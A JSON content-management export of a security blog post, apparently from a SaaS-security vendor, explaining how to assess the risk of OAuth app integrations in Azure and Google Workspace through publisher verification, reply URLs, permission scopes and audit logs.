"nodeType":178,"data":291977,"content":291978},{},[291979],{"nodeType":173,"value":270025,"marks":291980,"data":291981},[],{},{"nodeType":178,"data":291983,"content":291984},{},[291985],{"nodeType":173,"value":270032,"marks":291986,"data":291987},[],{},{"nodeType":312,"data":291989,"content":291992},{"target":291990},{"sys":291991},{"id":270039,"type":317,"linkType":318},[],{"nodeType":178,"data":291994,"content":291995},{},[291996],{"nodeType":173,"value":270045,"marks":291997,"data":291998},[],{},{"nodeType":178,"data":292000,"content":292001},{},[292002,292005,292009],{"nodeType":173,"value":270052,"marks":292003,"data":292004},[],{},{"nodeType":173,"value":270056,"marks":292006,"data":292008},[292007],{"type":1646},{},{"nodeType":173,"value":270061,"marks":292010,"data":292011},[],{},{"nodeType":235,"data":292013,"content":292014},{},[292015],{"nodeType":173,"value":269442,"marks":292016,"data":292017},[],{},{"nodeType":178,"data":292019,"content":292020},{},[292021],{"nodeType":173,"value":270074,"marks":292022,"data":292023},[],{},{"nodeType":178,"data":292025,"content":292026},{},[292027,292030,292037,292040,292047],{"nodeType":173,"value":270081,"marks":292028,"data":292029},[],{},{"nodeType":186,"data":292031,"content":292032},{"uri":270086},[292033],{"nodeType":173,"value":148689,"marks":292034,"data":292036},[292035],{"type":194},{},{"nodeType":173,"value":270093,"marks":292038,"data":292039},[],{},{"nodeType":186,"data":292041,"content":292042},{"uri":270098},[292043],{"nodeType":173,"value":270101,"marks":292044,"data":292046},[292045],{"type":194},{},{"nodeType":173,"value":270106,"marks":292048,"data":292049},[],{},{"nodeType":178,"data":292051,"content":292052},{},[292053],{"nodeType":173,"value":270113,"marks":292054,"data":292055},[],{},{"nodeType":178,"data":292057,"content":292058},{},[292059,292062,292069],{"nodeType":173,"value":270120,"marks":292060,"data":292061},[],{},{"nodeType":186,"data":292063,"content":292064},{"uri":270125},[292065],{"nodeType":173,"value":270128,"marks":292066,"data":292068},[292067],{"type":194},{},{"nodeType":173,"value":270133,"marks":292070,"data":292071},[],{},{"nodeType":178,"data":292073,"content":292074},{},[292075],{"nodeType":173,"value":270140,"marks":292076,"data":292077},[],{},{"nodeType":178,"data":292079,"content":292080},{},[292081],{"nodeType":173,"value":270147,"marks":292082,"data":292083},[],{},{"nodeType":169,"data":292085,"content":292086},{},[292087],{"nodeType":173,"value":270154,"marks":292088,"data":292089},[],{},{"nodeType":235,"data":292091,"content":292092},{},[292093],{"nodeType":173,"value":269400,"marks":292094,"data":292095},[],{},{"nodeType":178,"data":292097,"content":292098},{},[292099,292103,292111,292115,292123],{"nodeType":173,"value":270167,"marks":292100,"data":292102},[292101],{"type":1646},{},{"nodeType":186,"data":292104,"content":292105},{"uri":270173},[292106],{"nodeType":173,"value":270176,"marks":292107,"data":292110},[292108,292109],{"type":194},{"type":1646},{},{"nodeType":173,"value":270182,"marks":292112,"data":292114},[292113],{"type":1646},{},{"nodeType":186,"data":292116,"content":292117},{"uri":270188},[292118],{"nodeType":173,"value":270191,"marks":292119,"data":292122},[292120,292121],{"type":194},{"type":1646},{},{"nodeType":173,"value":270197,"marks":292124,"data":292126},[292125],{"type":1646},{},{"nodeType":178,"data":292128,"content":292129},{},[292130,292133,292140],{"nodeType":173,"value":270205,"marks":292131,"data":292132},[],{},{"nodeType":186,"data":292134,"content":292135},{"uri":270210},[292136],{"nodeType":173,"value":270213,"marks":292137,"data":292139},[292138],{"type":194},{},{"nodeType":173,"value":270218,"marks":292141,"data":292142},[],{},{"nodeType":246189,"data":292144,"content":292145},{},[292146,292155,292164,292173,292182],{"nodeType":254,"data":292147,"content":292148},{},[292149],{"nodeType":178,"data":292150,"content":292151},{},[292152],{"nodeType":173,"value":270231,"marks":292153,"data":292154},[],{},{"nodeType":254,"data":292156,"content":292157},{},[292158],{"nodeType":178,"data":292159,"content":292160},{},[292161],{"nodeType":173,"value":270241,"marks":292162,"data":292163},[],{},{"nodeType":254,"data":292165,"content":292166},{},[292167],{"nodeType":178,"data":292168,"content":292169},{},[292170],{"nodeType":173,"value":270251,"marks":292171,"data":292172},[],{},{"nodeType":254,"data":292174,"content":292175},{},[292176],{"nodeType":178,"data":292177,"content":292178},{},[292179],{"nodeType":173,"value":270261,"marks":292180,"data":292181},[],{},{"nodeType":254,"data":292183,"content":292184},{},[292185],{"nodeType":178,"data":292186,"content":292187},{},[292188],{"nodeType":173,"value":270271,"marks":292189,"data":292190},[],{},{"nodeType":178,"data":292192,"content":292193},{},[292194],{"nodeType":173,"value":270278,"marks":292195,"data":292196},[],{},{"nodeType":178,"data":292198,"content":292199},{},[292200],{"nodeType":173,"value":270285,"marks":292201,"data":292202},[],{},{"nodeType":178,"data":292204,"content":292205},{},[292206,292209,292216],{"nodeType":173,"value":270292,"marks":292207,"data":292208},[],{},{"nodeType":186,"data":292210,"content":292211},{"uri":270297},[292212],{"nodeType":173,"value":270300,"marks":292213,"data":292215},[292214],{"type":194},{},{"nodeType":173,"value":270305,"marks":292217,"data":292218},[],{},{"nodeType":178,"data":292220,"content":292221},{},[292222,292225,292232],{"nodeType":173,"value":270312,"marks":292223,"data":292224},[],{},{"nodeType":186,"data":292226,"content":292227},{"uri":270210},[292228],{"nodeType":173,"value":270319,"marks":292229,"data":292231},[292230],{"type":194},{},{"nodeType":173,"value":270324,"marks":292233,"data":292234},[],{},{"nodeType":178,"data":292236,"content":292237},{},[292238],{"nodeType":173,"value":270331,"marks":292239,"data":292240},[],{},{"nodeType":178,"data":292242,"content":292243},{},[292244,292247,292254,292257,292264],{"nodeType":173,"value":270338,"marks":292245,"data":292246},[],{},{"nodeType":186,"data":292248,"content":292249},{"uri":270343},[292250],{"nodeType":173,"value":270346,"marks":292251,"data":292253},[292252],{"type":194},{},{"nodeType":173,"value":270351,"marks":292255,"data":292256},[],{},{"nodeType":186,"data":292258,"content":292259},{"uri":270356},[292260],{"nodeType":173,"value":270359,"marks":292261,"data":292263},[292262],{"type":194},{},{"nodeType":173,"value":270364,"marks":292265,"data":292266},[],{},{"nodeType":235,"data":292268,"content":292269},{},[292270],{"nodeType":173,"value":269442,"marks":292271,"data":292272},[],{},{"nodeType":178,"data":292274,"content":292275},{},[292276],{"nodeType":173,"value":270377,"marks":292277,"data":292278},[],{},{"nodeType":178,"data":292280,"content":292281},{},[292282],{"nodeType":173,"value":270384,"marks":292283,"data":292284},[],{},{"nodeType":178,"data":292286,"content":292287},{},[292288],{"nodeType":173,"value":270391,"marks":292289,"data":292290},[],{},{"nodeType":169,"data":292292,"content":292293},{},[292294],{"nodeType":173,"value":270398,"marks":292295,"data":292296},[],{},{"nodeType":178,"data":292298,"content":292299},{},[292300],{"nodeType":173,"value":270405,"marks":292301,"data":292302},[],{},{"nodeType":235,"data":292304,"content":292305},{},[292306],{"nodeType":173,"value":270412,"marks":292307,"data":292308},[],{},{"nodeType":178,"data":292310,"content":292311},{},[292312,292315,292322],{"nodeType":173,"value":270419,"marks":292313,"data":292314},[],{},{"nodeType":186,"data":292316,"content":292317},{"uri":270424},[292318],{"nodeType":173,"value":270427,"marks":292319,"data":292321},[292320],{"type":194},{},{"nodeType":173,"value":270432,"marks":292323,"data":292324},[],{},{"nodeType":312,"data":292326,"content":292329},{"target":292327},{"sys":292328},{"id":270439,"type":317,"linkType":318},[],{"nodeType":178,"data":292331,"content":292332},{},[292333],{"nodeType":173,"value":270445,"marks":292334,"data":292335},[],{},{"nodeType":178,"data":292337,"content":292338},{},[292339,292342,292348],{"nodeType":173,"value":270452,"marks":292340,"data":292341},[],{},{"nodeType":186,"data":292343,"content":292344},{"uri":270457},[292345],{"nodeType":173,"value":270460,"marks":292346,"data":292347},[],{},{"nodeType":173,"value":270464,"marks":292349,"data":292350},[],{},{"nodeType":235,"data":292352,"content":292353},{},[292354],{"nodeType":173,"value":270471,"marks":292355,"data":292356},[],{},{"nodeType":178,"data":292358,"content":292359},{},[292360],{"nodeType":173,"value":270478,"marks":292361,"data":292362},[],{},{"nodeType":312,"data":292364,"content":292367},{"target":292365},{"sys":292366},{"id":270485,"type":317,"linkType":318},[],{"nodeType":235,"data":292369,"content":292370},{},[292371],{"nodeType":173,"value":270491,"marks":292372,"data":292373},[],{},{"nodeType":178,"data":292375,"content":292376},{},[292377],{"nodeType":173,"value":270498,"marks":292378,"data":292379},[],{},{"nodeType":312,"data":292381,"content":292384},{"target":292382},{"sys":292383},{"id":270505,"type":317,"linkType":318},[],{"nodeType":235,"data":292386,"content":292387},{},[292388],{"nodeType":173,"value":270511,"marks":292389,"data":292390},[],{},{"nodeType":178,"data":292392,"content":292393},{},[292394,292397,292404,292407,292414,292417,292424],{"nodeType":173,"value":270518,"marks":292395,"data":292396},[],{},{"nodeType":186,"data":292398,"content":292399},{"uri":270523},[292400],{"nodeType":173,"value":270526,"marks":292401,"data":292403},[292402],{"type":194},{},{"nodeType":173,"value":270531,"marks":292405,"data":292406},[],{},{"nodeType":186,"data":292408,"content":292409},{"uri":270536},[292410],{"nodeType":173,"value":270539,"marks":292411,"data":292413},[292412],{"type":194},{},{"nodeType":173,"value":270544,"marks":292415,"data":292416},[],{},{"nodeType":186,"data":292418,"content":292419},{"uri":270549},[292420],{"nodeType":173,"value":270552,"marks":292421,"data":292423},[292422],{"type":194},{},{"nodeType":173,"value":270557,"marks":292425,"data":292426},[],{},{"nodeType":178,"data":292428,"content":292429},{},[292430],{"nodeType":173,"value":270564,"marks":292431,"data":292432},[],{},{"nodeType":312,"data":292434,"content":292437},{"target":292435},{"sys":292436},{"id":270571,"type":317,"linkType":318},[],{"nodeType":178,"data":292439,"content":292440},{},[292441],{"nodeType":173,"value":270577,"marks":292442,"data":292443},[],{},{"nodeType":312,"data":292445,"content":292448},{"target":292446},{"sys":292447},{"id":270584,"type":317,"linkType":318},[],{"nodeType":235,"data":292450,"content":292451},{},[292452],{"nodeType":173,"value":270590,"marks":292453,"data":292454},[],{},{"nodeType":178,"data":292456,"content":292457},{},[292458],{"nodeType":173,"value":270597,"marks":292459,"data":292460},[],{},{"nodeType":178,"data":292462,"content":292463},{},[292464,292467,292474,292477,292484],{"nodeType":173,"value":270604,"marks":292465,"data":292466},[],{},{"nodeType":186,"data":292468,"content":292469},{"uri":270609},[292470],{"nodeType":173,"value":270612,"marks":292471,"data":292473},[292472],{"type":194},{},{"nodeType":173,"value":270617,"marks":292475,"data":292476},[],{},{"nodeType":186,"data":292478,"content":292479},{"uri":270622},[292480],{"nodeType":173,"value":270625,"marks":292481,"data":292483},[292482],{"type":194},{},{"nodeType":173,"value":270630,"marks":292485,"data":292486},[],{},{"nodeType":169,"data":292488,"content":292489},{},[292490],{"nodeType":173,"value":40632,"marks":292491,"data":292492},[],{},{"nodeType":178,"data":292494,"content":292495},{},[292496],{"nodeType":173,"value":270643,"marks":292497,"data":292498},[],{},{"nodeType":178,"data":292500,"content":292501},{},[292502],{"nodeType":173,"value":270650,"marks":292503,"data":292504},[],{},{"nodeType":178,"data":292506,"content":292507},{},[292508],{"nodeType":173,"value":270657,"marks":292509,"data":292510},[],{},{"nodeType":178,"data":292512,"content":292513},{},[292514],{"nodeType":173,"value":270664,"marks":292515,"data":292516},[],{},{"nodeType":312,"data":292518,"content":292521},{"target":292519},{"sys":292520},{"id":209109,"type":317,"linkType":318},[],{"nodeType":178,"data":292523,"content":292524},{},[292525],{"nodeType":173,"value":37,"marks":292526,"data":292527},[],{},{"items":292529},[292530,292532],{"sys":292531,"name":505},{"id":504},{"sys":292533,"name":509},{"id":508},{"items":292535},[292536],{"fullName":155981,"firstName":155982,"jobTitle":155983,"profilePicture":292537},{"url":155985},{"__typename":1528,"sys":292539,"content":292541,"title":292999,"synopsis":293000,"hashTags":118,"publishedDate":293001,"slug":293002,"tagsCollection":293003,"authorsCollection":293009},{"id":292540},"3cvobsSnd6xjB6tHhWt4bX",{"json":292542},{"data":292543,"content":292544,"nodeType":165},{},[292545,292552,292559,292566,292599,292606,292614,292647,292667,292674,292680,292686,292694,292701,292707,292713,292720,292727,292734,292753,292759,292766,292786,292793,292799,292807,292814,292821,292840,292847,292854,292861,292867,292874,292880,292887,292893,292900,292919,292927,292934,292941,292948,292954,292972,292979,292985,292992],{"data":292546,"content":292547,"nodeType":178},{},[292548],{"data":292549,"marks":292550,"value":292551,"nodeType":173},{},[],"An employee has added a new app-to-app (aka OAuth) integration to your Azure tenant or Google Workspace but you’re unsure of what it is or what risk it poses to your organization. We’ll cover a few techniques to help you assess the risk in this article.",{"data":292553,"content":292554,"nodeType":235},{},[292555],{"data":292556,"marks":292557,"value":258287,"nodeType":173},{},[292558],{"type":370},{"data":292560,"content":292561,"nodeType":178},{},[292562],{"data":292563,"marks":292564,"value":292565,"nodeType":173},{},[]," There are a few key questions to keep in mind when evaluating an OAuth integration:",{"data":292567,"content":292568,"nodeType":250},{},[292569,292579,292589],{"data":292570,"content":292571,"nodeType":254},{},[292572],{"data":292573,"content":292574,"nodeType":178},{},[292575],{"data":292576,"marks":292577,"value":292578,"nodeType":173},{},[],"Is the source (usually the app vendor) trustworthy?",{"data":292580,"content":292581,"nodeType":254},{},[292582],{"data":292583,"content":292584,"nodeType":178},{},[292585],{"data":292586,"marks":292587,"value":292588,"nodeType":173},{},[],"What can it do if it is not trustworthy? Does it have access to your data? How much access? Does it request more permissions that it should need to function?",{"data":292590,"content":292591,"nodeType":254},{},[292592],{"data":292593,"content":292594,"nodeType":178},{},[292595],{"data":292596,"marks":292597,"value":292598,"nodeType":173},{},[],"What does it actually do (i.e. what do the logs indicate)? Which teams or individuals will be using it and for what purposes?",{"data":292600,"content":292601,"nodeType":178},{},[292602],{"data":292603,"marks":292604,"value":292605,"nodeType":173},{},[],"There are a variety of data sources that can be considered for each of these primary questions, which we’ll break down in this next section:. ",{"data":292607,"content":292608,"nodeType":235},{},[292609],{"data":292610,"marks":292611,"value":292613,"nodeType":173},{},[292612],{"type":370},"Name and Verification Status",{"data":292615,"content":292616,"nodeType":178},{},[292617,292621,292630,292634,292643],{"data":292618,"marks":292619,"value":292620,"nodeType":173},{},[],"Every OAuth integration has a name and both Microsoft and Google verification processes that allow OAuth integrations to be verified as belonging to a particular company. Microsoft has a ",{"data":292622,"content":292624,"nodeType":186},{"uri":292623},"https://learn.microsoft.com/en-us/azure/active-directory/develop/publisher-verification-overview",[292625],{"data":292626,"marks":292627,"value":292629,"nodeType":173},{},[292628],{"type":194},"publisher verification process ",{"data":292631,"marks":292632,"value":292633,"nodeType":173},{},[],"that’s dependent on its Microsoft Cloud Partner Program, whereas Google has a ",{"data":292635,"content":292637,"nodeType":186},{"uri":292636},"https://support.google.com/cloud/answer/9110914?hl=en#zippy=%2Csteps-to-prepare-for-verification",[292638],{"data":292639,"marks":292640,"value":292642,"nodeType":173},{},[292641],{"type":194},"brand verification process",{"data":292644,"marks":292645,"value":292646,"nodeType":173},{},[]," that also has different levels of requirements depending on the level of data access requested.",{"data":292648,"content":292649,"nodeType":178},{},[292650,292654,292663],{"data":292651,"marks":292652,"value":292653,"nodeType":173},{},[],"While being verified does not mean an integration poses no risk – in fact, there ",{"data":292655,"content":292657,"nodeType":186},{"uri":292656},"https://msrc.microsoft.com/blog/2023/01/threat-actor-consent-phishing-campaign-abusing-the-verified-publisher-process/",[292658],{"data":292659,"marks":292660,"value":292662,"nodeType":173},{},[292661],{"type":194},"have been malicious phishing campaigns using verified publishers",{"data":292664,"marks":292665,"value":292666,"nodeType":173},{},[]," – it at least provides some extra assurance around what the integration actually is. This is especially true with Google integrations where access to restricted scopes has been granted.",{"data":292668,"content":292669,"nodeType":178},{},[292670],{"data":292671,"marks":292672,"value":292673,"nodeType":173},{},[],"For example, consider the Slack OAuth integration for Google Workspace. The name and icon make it very clear what the integration is claiming to be and the verification status shows that Google has verified this data - so you can quickly ensure the vendor is who they say they are, accept them as a third-party vendor, and move on to more traditional risk assessments. You can start to address questions like, “Should Slack be used within the organization?”  Does Slack as a company meet required security and compliance standards?” “Is an OAuth integration required or should it be used purely as a web or desktop app?,” and so on.   ",{"data":292675,"content":292679,"nodeType":312},{"target":292676},{"sys":292677},{"id":292678,"type":317,"linkType":318},"aYslILzQ1kwQUHy7Cw7lR",[],{"data":292681,"content":292685,"nodeType":312},{"target":292682},{"sys":292683},{"id":292684,"type":317,"linkType":318},"OmghmgRgSrdtMW9kgHaoa",[],{"data":292687,"content":292688,"nodeType":235},{},[292689],{"data":292690,"marks":292691,"value":292693,"nodeType":173},{},[292692],{"type":370},"Reply URLs and Approved Domains",{"data":292695,"content":292696,"nodeType":178},{},[292697],{"data":292698,"marks":292699,"value":292700,"nodeType":173},{},[],"Some integrations may be unverified or have very generic or confusing names that give little indication as to who is actually behind the integration. For example, consider the following Microsoft OAuth integration:",{"data":292702,"content":292706,"nodeType":312},{"target":292703},{"sys":292704},{"id":292705,"type":317,"linkType":318},"2smtwpUnKZElj4tmZUcobg",[],{"data":292708,"content":292712,"nodeType":312},{"target":292709},{"sys":292710},{"id":292711,"type":317,"linkType":318},"23Dg0elnnY1j0dHP3GICJc",[],{"data":292714,"content":292715,"nodeType":178},{},[292716],{"data":292717,"marks":292718,"value":292719,"nodeType":173},{},[],"This integration says that it’s Trello, the well known SaaS platform. However, it’s unverified, so how do we actually know it is really Trello and not a malicious app masquerading as Trello? Reply URLs (Microsoft) and approved domains (Google) are other interesting sources of data about an integration as they give authorized callback URLs. ",{"data":292721,"content":292722,"nodeType":178},{},[292723],{"data":292724,"marks":292725,"value":292726,"nodeType":173},{},[],"During a common code-based flow for an OAuth consent, once the user has authorized the request, a redirect needs to be made back to a domain/URL that is controlled by the OAuth app vendor to pass the code back to the app. Then the app can use the code to get a token that can be used to act on behalf of the user. ",{"data":292728,"content":292729,"nodeType":178},{},[292730],{"data":292731,"marks":292732,"value":292733,"nodeType":173},{},[],"If any domain or URL could be used then there would be nothing stopping an attacker from impersonating legitimate OAuth apps and having the details passed back to a domain they control. This is much less of an issue with code-based flows, since the attacker would need access to the app secrets as well. However, with implicit flows that pass the token back directly, that would mean an impersonation attack would be possible and implicit flows are still somewhat common. To guard against this, the app owner has to specify exactly which domains or URLs are permitted for sending codes and tokens to. ",{"data":292735,"content":292736,"nodeType":178},{},[292737,292741,292749],{"data":292738,"marks":292739,"value":292740,"nodeType":173},{},[],"For Microsoft, this is one of the many fields returned from Graph API if you ",{"data":292742,"content":292744,"nodeType":186},{"uri":292743},"https://learn.microsoft.com/en-us/graph/api/serviceprincipal-get?view=graph-rest-1.0&tabs=http",[292745],{"data":292746,"marks":292747,"value":292748,"nodeType":173},{},[],"enumerate the service principals for apps installed",{"data":292750,"marks":292751,"value":292752,"nodeType":173},{},[]," on your tenant. ",{"data":292754,"content":292758,"nodeType":312},{"target":292755},{"sys":292756},{"id":292757,"type":317,"linkType":318},"115UEpFqDESlZJ0F5TqMjj",[],{"data":292760,"content":292761,"nodeType":178},{},[292762],{"data":292763,"marks":292764,"value":292765,"nodeType":173},{},[],"In this case, the app has only one authorized reply URL, which points to trello.com. This means that authorization tokens can only be sent to this URL. So, for the integration to be used (or abused) the developer (or attacker) would need control of that domain. In this example, you’d have some assurance that this integration is legitimately associated with Trello. However, there are no guarantees. It’s possible for an attacker to put a range of domains in a malicious integration they control and they only need control of one domain to make use of it. So if attackerdomain.com was also present, then trello.com could just be an effort by an attacker to make their integration appear more legitimate. Therefore, you need to consider all domains present as a whole, as the presence of one known legitimate domain isn’t enough on its own if other domains might be questionable. ",{"data":292767,"content":292768,"nodeType":178},{},[292769,292773,292782],{"data":292770,"marks":292771,"value":292772,"nodeType":173},{},[],"One caveat here is that this is much less of an issue when it comes to Google apps that have been through Google brand verification. Part of the verification process involves ",{"data":292774,"content":292776,"nodeType":186},{"uri":292775},"https://developers.google.com/identity/protocols/oauth2/production-readiness/brand-verification#authorized-domains",[292777],{"data":292778,"marks":292779,"value":292781,"nodeType":173},{},[292780],{"type":194},"ensuring that the vendor owns the domains",{"data":292783,"marks":292784,"value":292785,"nodeType":173},{},[]," (approved domains) registered in any callbacks. Therefore, if it’s a Google verified app then you don’t have to worry about legitimate domains being impersonated by an attacker to give a fake sense of legitimacy. ",{"data":292787,"content":292788,"nodeType":178},{},[292789],{"data":292790,"marks":292791,"value":292792,"nodeType":173},{},[],"It used to be possible to query the approved domains for a Google app via an undocumented API, however, this recently stopped returning this information. However, there are still other details returned by the API that can be of use during an investigation. See an example for Slack below, but you can replace the project ID in the URL with any app project ID:",{"data":292794,"content":292798,"nodeType":312},{"target":292795},{"sys":292796},{"id":292797,"type":317,"linkType":318},"4kw9ZSZaGhbmvrp3wlaJgW",[],{"data":292800,"content":292801,"nodeType":235},{},[292802],{"data":292803,"marks":292804,"value":292806,"nodeType":173},{},[292805],{"type":370},"Permissions",{"data":292808,"content":292809,"nodeType":178},{},[292810],{"data":292811,"marks":292812,"value":292813,"nodeType":173},{},[],"Both Google and Microsoft provide a very large number of permissions to give fine-grained control of what level of data access an OAuth integration has. This can be everything from a simple social login to access to high-risk data assets, like document stores and email inboxes, as well as administrative functionality. ",{"data":292815,"content":292816,"nodeType":178},{},[292817],{"data":292818,"marks":292819,"value":292820,"nodeType":173},{},[],"It’s worth noting a few differences between how Microsoft and Google handle these permissions. While both have a very large number of fine-grained permissions for users to delegate, Microsoft also has the concept of App Roles, which administrative users can consent to as well. These are often similarly named to delegated permissions, except they give access to data for all users rather than just for the user granting consent. ",{"data":292822,"content":292823,"nodeType":178},{},[292824,292828,292837],{"data":292825,"marks":292826,"value":292827,"nodeType":173},{},[],"For example, an ordinary user might be able to consent to grant access to their exchange email inbox using a delegated permission, but an app could also request access to an app role to allow access to all users’ email inboxes and an administrative user could consent to that using the same consent screen. Google does have similar capabilities but they are managed separately ",{"data":292829,"content":292831,"nodeType":186},{"uri":292830},"https://support.google.com/a/answer/162106?hl=en",[292832],{"data":292833,"marks":292834,"value":292836,"nodeType":173},{},[292835],{"type":194},"using domain-wide delegation",{"data":292838,"marks":292839,"value":197,"nodeType":173},{},[],{"data":292841,"content":292842,"nodeType":178},{},[292843],{"data":292844,"marks":292845,"value":292846,"nodeType":173},{},[],"Another important difference to consider here is that, as mentioned in the section above about verification, Google has different verification requirements depending on the data access requested. Microsoft allows even unverified apps to request access to any data, whereas Google designates some of the most sensitive data sources (such as Google Drive and Gmail) as being sensitive and requiring an app to not just be verified but to have undergone a much more stringent manual security review, including third-party security testing. ",{"data":292848,"content":292849,"nodeType":178},{},[292850],{"data":292851,"marks":292852,"value":292853,"nodeType":173},{},[],"Even without good reason to trust an OAuth integration, if the permissions it requests are extremely low risk then arguably it isn’t much of an issue. On the other hand, organizations with a need for a particularly stringent level of security may not be comfortable sharing high risk permissions with even fairly established SaaS vendors. Consequently, one of the most important data sources for evaluating the risk of an OAuth integration is to look at the permissions it exposes. ",{"data":292855,"content":292856,"nodeType":178},{},[292857],{"data":292858,"marks":292859,"value":292860,"nodeType":173},{},[],"An important factor to consider is that permissions are not necessarily fixed to be the same for every user. If more than one employee makes use of the same SaaS integration, it’s possible they may grant different permissions depending on what the integration does and how they enabled it. For example, let’s consider the Slack integration we saw before:",{"data":292862,"content":292866,"nodeType":312},{"target":292863},{"sys":292864},{"id":292865,"type":317,"linkType":318},"37l3selHqmcY8PKCLZEiKN",[],{"data":292868,"content":292869,"nodeType":178},{},[292870],{"data":292871,"marks":292872,"value":292873,"nodeType":173},{},[],"In this particular example, we have 15 users who have granted access to three different very low risk permissions concerning their basic account information, which typically are the minimum required in order to enable a simple social login. However, additional permissions have been granted for some other users:",{"data":292875,"content":292879,"nodeType":312},{"target":292876},{"sys":292877},{"id":292878,"type":317,"linkType":318},"3pJ0G2yfMnM7fNpP3IMs3a",[],{"data":292881,"content":292882,"nodeType":178},{},[292883],{"data":292884,"marks":292885,"value":292886,"nodeType":173},{},[],"It seems 15 users have also allowed access to their Google calendars and 5 users have also allowed full access to their Google Drive. This is due to different employees adding different Slack apps to enable calendar and file integration. For example, a standard social login to Slack using a Google account won’t even present the user with a consent screen because it only requests the most basic scopes. However, add a sensitive Slack app integration, like the one for Google Drive, and the user will receive a consent screen that looks like this, which is where this difference between users comes from:",{"data":292888,"content":292892,"nodeType":312},{"target":292889},{"sys":292890},{"id":292891,"type":317,"linkType":318},"fjM0oY0viy3p9OAxdrmtT",[],{"data":292894,"content":292895,"nodeType":178},{},[292896],{"data":292897,"marks":292898,"value":292899,"nodeType":173},{},[],"Even if Slack is an officially used SaaS provider for an organization though, perhaps enabling complete Google Drive access to a third party would be seen as a compliance risk too far, in which case, you could revoke the file permissions to reduce risk, if desired. ",{"data":292901,"content":292902,"nodeType":178},{},[292903,292907,292915],{"data":292904,"marks":292905,"value":292906,"nodeType":173},{},[],"In cases of untrusted OAuth integrations or those that are difficult to verify, the overall risk still remains very low if innocuous permissions like those required for social logins are the only permissions granted. In fact, the majority of OAuth integrations we see at Push do not request anything other than social login permissions. If you want to know more about social login risk then check our previous article ",{"data":292908,"content":292911,"nodeType":1698},{"target":292909},{"sys":292910},{"id":273995,"type":317,"linkType":318},[292912],{"data":292913,"marks":292914,"value":28052,"nodeType":173},{},[],{"data":292916,"marks":292917,"value":292918,"nodeType":173},{},[],". However, much more careful attention should be paid once you see unknown integrations with high- risk permissions, such as full access to file stores.",{"data":292920,"content":292921,"nodeType":235},{},[292922],{"data":292923,"marks":292924,"value":292926,"nodeType":173},{},[292925],{"type":370},"Activity Logs",{"data":292928,"content":292929,"nodeType":178},{},[292930],{"data":292931,"marks":292932,"value":292933,"nodeType":173},{},[],"It’s one thing to know what an integration can access in principle, due to its permissions, but it’s another to know what it’s actually doing. In one case, an integration may have requested permissions in order to access a user’s entire file store, but it may only use that functionality when specifically directed to as a result of a user attempting to share a file or some other trigger activity.",{"data":292935,"content":292936,"nodeType":178},{},[292937],{"data":292938,"marks":292939,"value":292940,"nodeType":173},{},[],"That isn’t to say there is no risk, certainly if the vendor is compromised and the tokens stolen then an attacker could arbitrarily access any files they like. However, if an integration constantly accesses all users files and syncs them in their entirety then that is clearly a very different risk profile to observe. Additionally, the ability to determine what an integration has actually done in an incident response scenario is invaluable.  ",{"data":292942,"content":292943,"nodeType":178},{},[292944],{"data":292945,"marks":292946,"value":292947,"nodeType":173},{},[],"Microsoft and Google offer different options here, which aren’t always available by default. Google provides API call visibility for OAuth integrations, which gives extremely detailed visibility of what an OAuth integration is doing and when. Here you can see the Slack integration using its Google Drive permissions to look for notifications for file changes, while the Thunderbird email integration is accessing some gmail related label data:",{"data":292949,"content":292953,"nodeType":312},{"target":292950},{"sys":292951},{"id":292952,"type":317,"linkType":318},"UqbMx5UzEimig5uvUvag7",[],{"data":292955,"content":292956,"nodeType":178},{},[292957,292961,292968],{"data":292958,"marks":292959,"value":292960,"nodeType":173},{},[],"The key caveat with Google is that it’s not available on all plans. You can see ",{"data":292962,"content":292964,"nodeType":186},{"uri":292963},"https://support.google.com/a/answer/6124308?hl=en",[292965],{"data":292966,"marks":292967,"value":28052,"nodeType":173},{},[],{"data":292969,"marks":292970,"value":292971,"nodeType":173},{},[]," that it's only available using Enterprise, Education and Cloud Identity Premium licenses. ",{"data":292973,"content":292974,"nodeType":178},{},[292975],{"data":292976,"marks":292977,"value":292978,"nodeType":173},{},[],"For Microsoft, rather than separate OAuth API call data, detailed audit data available as part of Microsoft Purview often gives context that can be traced back to OAuth integrations when that was the source. For example, here you can see the Mozilla Thunderbird OAuth integration being used to download a file from OneDrive. This is the same event you would get if a file was downloaded from a web interface, but in this case you can see in the AppAccessContext that it specifies a ClientAppId, which refers to the OAuth integration performing the action. This means you can track all activity specifically back to individual OAuth integrations separately from activity performed by a user within web interfaces - a very useful capability!",{"data":292980,"content":292984,"nodeType":312},{"target":292981},{"sys":292982},{"id":292983,"type":317,"linkType":318},"38oqwAXkDrQSJzP1ByECLF",[],{"data":292986,"content":292987,"nodeType":235},{},[292988],{"data":292989,"marks":292990,"value":40632,"nodeType":173},{},[292991],{"type":370},{"data":292993,"content":292994,"nodeType":178},{},[292995],{"data":292996,"marks":292997,"value":292998,"nodeType":173},{},[],"In this article, we have seen a range of ways that OAuth integrations for both Microsoft and Google can be investigated in order to gain a better understanding of their risk profile, as well as investigating what they actually do in an incident response scenario. While there are no hard and fast rules for when an integration should be considered safe or dangerous, hopefully this gives some idea as to how to perform a risk assessment to make a call depending on your organization’s risk tolerance level. ","An investigation guide for assessing app-to-app OAuth integration risk","An employee has added a new integration to your Azure tenant or Google Workspace. How do you assess risk? We’ll cover a few techniques in this article.","2023-03-15T00:00:00.000Z","an-investigation-guide-for-assessing-app-to-app-oauth-integration-risk",{"items":293004},[293005,293007],{"sys":293006,"name":509},{"id":508},{"sys":293008,"name":26133},{"id":26132},{"items":293010},[293011],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":293012},{"url":8615},{"items":293014},[293015],{"fullName":155981,"firstName":155982,"jobTitle":155983,"profilePicture":293016},{"url":155985},"content:blog:the-risky-terrain-of-oauth-scopes-in-third-party.json","blog/the-risky-terrain-of-oauth-scopes-in-third-party.json","blog/the-risky-terrain-of-oauth-scopes-in-third-party",{"_path":293021,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":293022,"ogImage":118,"summary":293024,"title":287700,"subtitle":118,"metaTitle":293041,"synopsis":287701,"hashTags":118,"publishedDate":287702,"slug":287703,"tagsCollection":293042,"relatedBlogPostsCollection":293048,"authorsCollection":294063,"content":294067,"_id":294450,"_type":5439,"_source":5440,"_file":294451,"_stem":294452,"_extension":5439},"/blog/understanding-shadow-it",{"id":287269,"publishedAt":293023},"2025-01-15T14:34:58.825Z",{"json":293025},{"data":293026,"content":293027,"nodeType":165},{},[293028,293035],{"data":293029,"content":293030,"nodeType":178},{},[293031],{"data":293032,"marks":293033,"value":293034,"nodeType":173},{},[],"In this article, we’ll define shadow IT and shadow SaaS, talk through the serious 